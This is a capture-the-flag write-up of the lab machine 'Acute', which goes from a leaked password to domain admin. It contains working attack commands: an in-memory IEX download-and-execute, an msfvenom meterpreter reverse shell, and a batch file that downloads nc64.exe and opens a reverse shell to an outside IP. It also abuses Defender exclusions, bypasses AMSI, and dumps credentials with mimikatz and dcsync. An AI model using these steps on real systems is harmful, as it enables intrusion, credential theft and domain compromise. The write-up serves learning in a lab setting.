Acute was hard rated box which involved enumerating the web site to find a word document having the link to PowerShell Web Access (PSWA) also having the hostname in meta data and the password in the document, the username was found through the about page from the site, giving us PSWA for evadies
, having landed on a container we were able to find the whitelisted path for defender and the active session on host which allowed us to upload meterpreter payload and use it to view the GUI to get credentials for imonks
and the policy configuration on the domain controller from which we were able to escalate to jmorgan
who had Impersonate privileges from which we can dump the SAM hashes and through password reuse get awallace
from where we were able to add this user in domain admins group
NMAP
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Issuer: commonName=acute-ATSSERVER-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-06T06:34:58
| Not valid after: 2030-01-04T06:34:58
| MD5: cf3a d387 8ede 75cf 89c1 8806 0b6b c823
|_SHA-1: f954 d677 0cf3 54df 3fa2 ed4f 78c3 1902 c120 a368
|_ssl-date: 2022-02-13T14:22:11+00:00; -3s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -3s
Surprisingly this box had only one port open which wasport 443
PORT 443 (HTTPS)
Visiting the web server we’ll get 404 status code
From the nmap scan we can see the domain name atsserver.acute.local
so let's add this to /etc/hosts
file
After adding the domain and accessing it we can see a web page
We can see from the wappalyzer browser extensions that the web page is using wordpress
Clicking on the courses it will just give us a 404 status code as the page doesn’t exist
Running dirsearch
to fuzz for files and directories didn't revealed anything interesting
Viewing the about me section we’ll see a link to a word document
On opening that we’ll see two links but those link would give a 404 status code
Scrolling down we can see a password Password1!
and a url to access Windows PowerShell Web Access
I tried this password for Lois
as at the end of the document we can see that he is allowed to change group member permissions
But it failed , going back to about
page we can see some user names
Foothold
Now we don’t know what’s the username also we don’t know the name of the computer , so running exiftool
on the word document
This reveals the computer name which is Acute-PC01
. I tried FCastle
as a username with the password that we have got but it didn't worked , I went on trying the usernames that we have found on the about section and EDavies
worked
We got a powershell session through browser but it seems like we are in a container because the IP is 172.16.22.2
, running net user
command to check in which groups we are in , it gives an error that this user doesn't exist
We can try to scan 172.16.22.1
as it's the gateway and may have some interesting ports open, since we can't really install nmap on this machine we could try using a powershell script for scanning ports
https://github.com/JustinGrote/PoshNmap
After transferring if we’ll try running the powershell script, it won’t allow us as it’s disable to run scripts
We can try downloading it through IEX
which imports the script in the memory
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.56:2222/powershell-nmap.ps1')
The ports that it shows are dns,smb,winrm and ldap which could mean this maybe a domain controller, I wasn’t able to specify the script to scan port 88 so I moved on
In Users directory we can see few users but we don’t have permissions to view the contents
Going into C
drive we see a folder named Utils
it shows that doesn't have any files
On viewing the hidden files with dir -Force
we can see a ini file
Which shows that it windows defender doesn’t check this directory for malicious files maybe ,whitelisted directory can also be found by looking at the defender’s exclusion path
https://petri.com/microsoft-defender-exclusions-list-windows-10/
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
so first we need to generate a msfvenom
payload for meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=2222 -f exe > shell.exe
Now to host this payload using python3
Checking our meterpreter listener, we’ll get a shell
Having a meterpreter session , I spawned powershell to download chisel
so I can try scanning the gateway through socks5 proxy
Make sure to add socks 5 127.0.0.1 1080
in /etc/proxychains.conf
And this shows that it really is the domain controller as kerberos is running, I enumerated the whole container but there wasn’t anything interesting , after running winpeas on the container it showed hat there was one RDP session active
This could also been found through query user
which lists the active login sessions
Privilege Escalation (imonks)
Using screenshare
feature, we can see the GUI of the windows machine and there was script running which was connecting to the actual host machine with the credentials imonks:W3_4R3_th3_f0rce.
We need to make a credential and secure password string object
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential('acute\imonks',$pass)Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { whoami } -Credential $credential
But we can only run limited commands on the ATSSERVER because of dcmanage
configuration which is used running specific commands for managing the server
http://woshub.com/using-powershell-just-enough-administration-jea/
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { Get-Command } -Credential $credential
We can run Get-Alias
to see the shortcut of these commands
In imonks
directory we see a powershell script wm.ps
Privilege Escalation (jmorgan)
This script is using actue\jmorgan
's secure password to run Get-Volume
on the container that we have a web based powershell so what if we made it to execute our payload in C:\Utils
which will give us a reverse shell as jmorgan
To do this we can use powershell’s cmdlet Get-Content
and Set-Content
https://mcpmag.com/articles/2018/08/08/replace-text-with-powershell.aspx
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { (Get-Content -path C:\Users\imonks\Desktop\wm.ps1) -replace 'Get-Volume','cmd.exe /c C:\Utils\uwu.exe' } -Credential $credential
With this command we can replace Get-Volume
in the script to our payload but it won't be written out to a file it will just output on the powershell
So with Set-Content
we can write the output to the file itself and then run the powershell script
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { ((Get-Content -path C:\Users\imonks\
Desktop\wm.ps1) -replace 'Get-Volume','cmd.exe /c C:\Utils\uwu.exe') | Set-Content -Path C:\Users\imonks\Desktop\wm.ps1
} -Credential $credentialInvoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 } -Credential $credential
After getting jmorgan
we can check this user's privileges with getprivs
or if we want to use cmd we can use whoami /all
Through this privilege we can become SYSTEM user on the container by running getsystem
and then can dump NTLM hashes on the container
Privilege Escalation (awallace)
Grabbing Administrator’s and Natasha’s hash we can check if they are crackable , using crackstation
we can crack the administrator's hash and get the password Password@123
On ATSSERVER we have 3 users that we can try this password , Administrator
, lhopkins
and awallace
.
I tried for lhopkins but it failed, moving on to awallace
it worked for awallace but still we have limited commands that we can run on the ATSSERVER
We don’t actually see anything other than keepmeon
folder in C:\Program Files
There’s a bat file in that folder
Reading the contents of this bat file
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
Now analyzing this batch script , here there’s a loop running , /R
meaning that it loops through files in the current directory and looks for .bat
file and then it will call
that file if found , it also mentions that this batch script runs as lhopkins(Lois)
user
Going back to that word document it mentions about Lois the only user to group membership also that only he can become site admin
Running net group /domain
we can see a group named Site_Admin
Checking the description of this group it says that it has access to domain admin group
So using Set-Content
we can add the command net group Site_Admin "awallace" /add /domain
to add this user to Site_Admin group
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { Set-Content "C:\Program Files\keepmeon\uwu.bat" -Value ‘net group Site_Admin "awallace" /add /domain’ } -Credential $credential
Checking the groups in which awallace is in we can see that he has been added to Site_Admin
Being in this group we can access the Administrator
's directory and get the root flag
Even though this is where the box ends but I wanted to see if we can get dump the hashes so having the chisel socks proxy running , I tried using secretsdump.py
using awallace's credentials as we are in site_admin group which is an alias for domain admin group
It didn’t allow authenticating with credentials, so instead I tried generate a TGT for the user and used the script with kerberos authentication
Now exporting this `KRB5CCNAME` variable
But this again kept failing
I got back to awallace and tried getting a reverse shell and the way we can do this as we have limited commands to execute we can’t directly just make a request to our server to download nc or anything so instead we can use environmental variables so store any command also we can use `r`n
for new line in a string
https://shellgeek.com/how-to-add-newline-to-string-or-variable/
Also throughout the box I used Invoke-Command
with the computer name which was creating an adhoc session for remote powershell session on ATSSERVER which means that as soon as the commands get exited it would just clear our session meaning if we create environmental variables they will be removed so for creating a persistent session we can use `New-PSSession
https://devops-collective-inc.gitbook.io/secrets-of-powershell-remoting/session-management
Keeping awallace’s credentials
$sess = New-PSSession -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $credential
This file downloads the nc64.exe (make sure to get 1.12 as the defender removes the previous one)Invoke-Command -Session $sess -ScriptBlock { $var1 = "powershell.exe -c Invoke-WebRequest 'http://10.10.14.61:3333/nc64.exe' -OutFile 'nc64.exe' `r`n " }
This command will be executed after nc64.exe is downloadedInvoke-Command -Session $sess -ScriptBlock { $var2 = "nc64.exe 10.10.14.61 5555 -e cmd.exe `r`n " }
This will write the values of both variables in the bat fileInvoke-Command -Session $sess -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\uwu.bat" -Value $var1,$var2 }
Since lhopkins
has rights to add members in Site_admin group we can him in this group which has the same privilege as Domain Admins group
Here we can’t just use mimikatz powershell script to dump hashes because of AMSI but we can bypass it by using Invoke-OneShot
script which will import mimikatz at the same time
https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093
Make sure to have mimikatz script on your local machine and change the location of the script to your IP
This dumped LSASS, we can also dump NTDS.dit with lsadump::dcsync /domain:acute.local /all
References
- https://github.com/JustinGrote/PoshNmap
- https://4sysops.com/archives/using-a-local-variable-in-a-remote-powershell-session/
- http://woshub.com/using-powershell-just-enough-administration-jea/
- https://petri.com/microsoft-defender-exclusions-list-windows-10/
- https://mcpmag.com/articles/2018/08/08/replace-text-with-powershell.aspx
- https://ss64.com/nt/for_r.html
- https://techgenix.com/output-contents-to-a-file-powershell/
- https://shellgeek.com/how-to-add-newline-to-string-or-variable/
- https://devops-collective-inc.gitbook.io/secrets-of-powershell-remoting/session-management
- https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093